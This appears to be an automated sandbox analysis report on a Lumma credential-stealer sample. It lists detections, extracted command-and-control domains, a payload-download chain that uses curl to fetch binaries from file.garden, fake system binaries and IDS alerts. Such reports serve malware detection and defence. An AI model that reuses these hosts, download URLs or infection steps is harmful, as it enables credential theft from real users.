Source: https://steamcommunity.com/profiles/76561199724331900

URL Reputation: Label: malware

Antivirus detection for dropped file

Source: C:\Edge\L6lFlVnd0szYUYb26bZc.vbe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Windows\Speech\kdmapper.exe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\AppData\Local\Temp\qgs8WdcQ4J.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Edge\msedge.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\Users\user\Desktop\AznuGYbp.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\AppData\Local\Temp\FVbPldJoKd.bat	Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\KiGKqBgX.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\Desktop\EagcoYZU.log	Avira: detection malicious, Label: TR/AVI.Agent.updqb
Source: C:\Users\user\Desktop\OJAsYAeC.log	Avira: detection malicious, Label: TR/PSW.Agent.qngqt
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Found malware configuration

Source: 12.2.RegAsm.exe.400000.0.raw.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["coursedonnyre.shop", "appleboltelwk.shop", "tiddymarktwo.shop", "surveriysiop.shop", "strappystyio.shop", "captainynfanw.shop", "tearrybyiwo.shop", "tendencerangej.shop", "fossillargeiw.shop"], "Build id": "1AsNN2--5899070203"}

Multi AV Scanner detection for dropped file

Source: C:\Edge\msedge.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\Desktop\ERJdElGX.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\IlfCUBRc.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\KiGKqBgX.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\OJAsYAeC.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\oYbYVUjG.log	ReversingLabs: Detection: 25%
Source: C:\Users\user\Desktop\rWfFWfLI.log	ReversingLabs: Detection: 25%
Source: C:\Windows\Speech\kdmapper.exe	ReversingLabs: Detection: 68%
Source: C:\Windows\Speech\physmeme.exe	ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: seoI30IZZr.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Joe Sandbox ML: detected
Source: C:\Windows\Speech\kdmapper.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\oYbYVUjG.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\jsWPmlvb.log	Joe Sandbox ML: detected
Source: C:\Edge\msedge.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\mOEXVCEF.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\KiGKqBgX.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\OJAsYAeC.log	Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\rWfFWfLI.log	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\WmiPrvSE.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: seoI30IZZr.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: strappystyio.shop
Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: coursedonnyre.shop
Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fossillargeiw.shop
Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tendencerangej.shop
Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: appleboltelwk.shop
Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tearrybyiwo.shop
Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: captainynfanw.shop
Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: surveriysiop.shop
Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tiddymarktwo.shop
Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000C.00000002.1538070748.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: 1AsNN2--5899070203

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.8:49710 version: TLS 1.2

Source: seoI30IZZr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: kdmapper.exe, 00000005.00000002.1501843564.0000000000633000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe, 00000005.00000003.1497197770.000000000696D000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000003.1497756532.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, kdmapper.exe, 00000005.00000000.1495581926.0000000000633000.00000002.00000001.01000000.00000006.sdmp, kdmapper.exe.4.dr
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\lar3wzdd\lar3wzdd.pdb source: msedge.exe, 00000010.00000002.1710778572.0000000002DD7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Goziix\Desktop\Ghosty\build\usermode\usermode.pdb source: seoI30IZZr.exe
Source:	Binary string: 8C:\Users\user\AppData\Local\Temp\iikyx55j\iikyx55j.pdb source: msedge.exe, 00000010.00000002.1710778572.0000000002DD7000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Goziix\Desktop\Ghosty\build\usermode\usermode.pdb66 source: seoI30IZZr.exe
Source:	Binary string: c:\rje\tg\k5ye\obj\Release\Fcs.pdb source: curl.exe, 00000007.00000003.1507989582.000001B321173000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1507585086.000001B32118C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1508229989.000001B32118C000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1507585086.000001B321173000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1508518215.000001B321131000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000007.00000003.1507989582.000001B32118C000.00000004.00000020.00020000.00000000.sdmp, physmeme.exe.7.dr

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Source: C:\Users\user\Desktop\seoI30IZZr.exe	Code function: 0_2_00007FF78662DB3C GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,	0_2_00007FF78662DB3C
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0060A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	5_2_0060A69B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0061C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	5_2_0061C220
Source: C:\Windows\Speech\kdmapper.exe	Code function: 5_2_0062B348 FindFirstFileExA,	5_2_0062B348

Source: C:\Edge\msedge.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [ecx+eax]	12_2_0040F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	12_2_0041407F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	12_2_0041407F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+28h]	12_2_00414031
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	12_2_0042D150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	12_2_0043F150
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, eax	12_2_00407170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	12_2_00441100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	12_2_0044A1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h	12_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], ax	12_2_0041F193
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	12_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	12_2_00416361
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h	12_2_0044A360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0042D3CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_004473FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-34h]	12_2_00424390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	12_2_004283A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	12_2_004303B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+04h]	12_2_0043F479
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	12_2_0042F40F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_00443420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah	12_2_0044A4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	12_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ebp	12_2_0040A4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-18h]	12_2_0042B490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0044A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	12_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-54h]	12_2_004206E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh	12_2_00443870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0043F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h	12_2_0043F8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	12_2_0043A880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_0044A8B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	12_2_004468B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	12_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	12_2_00426910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	12_2_004449F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	12_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, ecx	12_2_0041399C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_004499B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebp, word ptr [edi]	12_2_0043EA30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	12_2_00415ADF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	12_2_0041DAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push ebx	12_2_0041DAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+10h]	12_2_0040DAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	12_2_00426B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh	12_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh	12_2_0042BC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	12_2_00449C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	12_2_00413CC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+08h]	12_2_00412653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	12_2_0042CCDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [edi+eax]	12_2_0042CCF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_00428C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+edi]	12_2_00404CB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	12_2_0042ED6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-14h]	12_2_0042ED6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ebx]	12_2_00405D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+20h]	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esi+00000744h]	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], al	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, 0000000Bh	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], al	12_2_00431E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	12_2_00447E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh	12_2_00447E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi], 00000000h	12_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	12_2_00415EF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	12_2_0041AF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	12_2_00410F0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [ebp-3Ch]	12_2_0042DFD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh	12_2_00443FA0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2056052 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (strappystyio .shop) : 192.168.2.8:59161 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056172 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tiddymarktwo .shop) : 192.168.2.8:55029 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056046 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fossillargeiw .shop) : 192.168.2.8:55758 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056054 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (surveriysiop .shop) : 192.168.2.8:58540 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056056 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tearrybyiwo .shop) : 192.168.2.8:53563 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056058 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tendencerangej .shop) : 192.168.2.8:61329 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056042 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (coursedonnyre .shop) : 192.168.2.8:50670 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056036 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (appleboltelwk .shop) : 192.168.2.8:50741 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2056040 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (captainynfanw .shop) : 192.168.2.8:55461 -> 1.1.1.1:53

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: coursedonnyre.shop
Source: Malware configuration extractor	URLs: appleboltelwk.shop
Source: Malware configuration extractor	URLs: tiddymarktwo.shop
Source: Malware configuration extractor	URLs: surveriysiop.shop
Source: Malware configuration extractor	URLs: strappystyio.shop
Source: Malware configuration extractor	URLs: captainynfanw.shop
Source: Malware configuration extractor	URLs: tearrybyiwo.shop
Source: Malware configuration extractor	URLs: tendencerangej.shop
Source: Malware configuration extractor	URLs: fossillargeiw.shop

Tries to resolve many domain names, but no domain seems valid

Source: unknown	DNS traffic detected: query: fossillargeiw.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: appleboltelwk.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tendencerangej.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tearrybyiwo.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: strappystyio.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: tiddymarktwo.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: coursedonnyre.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: zelensky.top replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: captainynfanw.shop replaycode: Name error (3)
Source: unknown	DNS traffic detected: query: surveriysiop.shop replaycode: Name error (3)

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost

Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 104.102.49.254 104.102.49.254

Source: Joe Sandbox View	JA3 fingerprint: 74954a0c86284d0d6e1c4efefe92b521
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic

HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/kdmapper.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /ZmE_ziOgiFXI9Y48/physmeme.bin HTTP/1.1Host: file.gardenUser-Agent: curl/7.83.1Accept: /
Source: global traffic	HTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com

Source: RegAsm.exe, 0000000C.00000002.1539072890.0000000001357000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
